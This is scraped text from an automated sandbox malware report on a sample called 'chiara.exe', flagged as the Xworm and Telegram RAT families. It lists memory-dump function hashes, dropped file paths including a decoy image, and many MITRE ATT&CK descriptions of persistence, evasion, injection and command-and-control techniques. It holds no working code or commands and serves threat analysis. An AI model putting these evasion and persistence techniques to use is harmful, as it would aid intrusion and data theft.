Instruction ID: e4facf4fc1deaf2d394f5e88559e52f265115935e19905ae7958bf440515529f
Opcode Fuzzy Hash: b1aaadb9576c395d56dcfb44cf0269742ee65f6e03b602d86525a50a650c80b6
Instruction Fuzzy Hash: 4B31E2326192448FC706677CE95966DBFB5EF86214F4509EAD4C8D7292DF380C0AC3A2

Function 07D19994 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2899dd0dc5d9a6ceb6ec30036799a893109ef9815a9bcc8d91b15dc12ff668ca
Instruction ID: e9204bc319b2edcf57e9294a9a972efafff3af84b326c37a0d61e824935e9c81
Opcode Fuzzy Hash: 2899dd0dc5d9a6ceb6ec30036799a893109ef9815a9bcc8d91b15dc12ff668ca
Instruction Fuzzy Hash: 9A2177A164E3C24FE70797749C791A9BF759F43210B0A02E7D095CB1E3C2289C0AC762

Function 07D1924C Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd71f79df78ef9368c98df595894787567ab0e890139af546ffa86ab471746a8
Instruction ID: 857a2f232cbd00d89f836452d99641ff964e1efc54cdaf2fdbaaee5928eb7800
Opcode Fuzzy Hash: fd71f79df78ef9368c98df595894787567ab0e890139af546ffa86ab471746a8
Instruction Fuzzy Hash: 3301287450A7848FD3069B74E8642A5BFB4EF5A30574A00DBE855C6267C738A545CB21

Function 07D19270 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2589306758.0000000007D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D10000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d4cdac9ae6651257e6ae7f6cdec2541277727e47a8981f083bf990b9bd9661f
Instruction ID: 8525236e9efefbb27372f9dc59ec928c9984c236728d5b7658c7ff0fcf6c04dd
Opcode Fuzzy Hash: 9d4cdac9ae6651257e6ae7f6cdec2541277727e47a8981f083bf990b9bd9661f
Instruction Fuzzy Hash: 41E012783043419FD7147BB5F52862577EDEB5D70534104A6E415C2265CF34F840CA31

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report chiara.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Telegram RAT

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Windows Logon Application.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shost.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\RarSFX0\Chiara_31Agosto2024.jpg

Windows Analysis Report
chiara.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre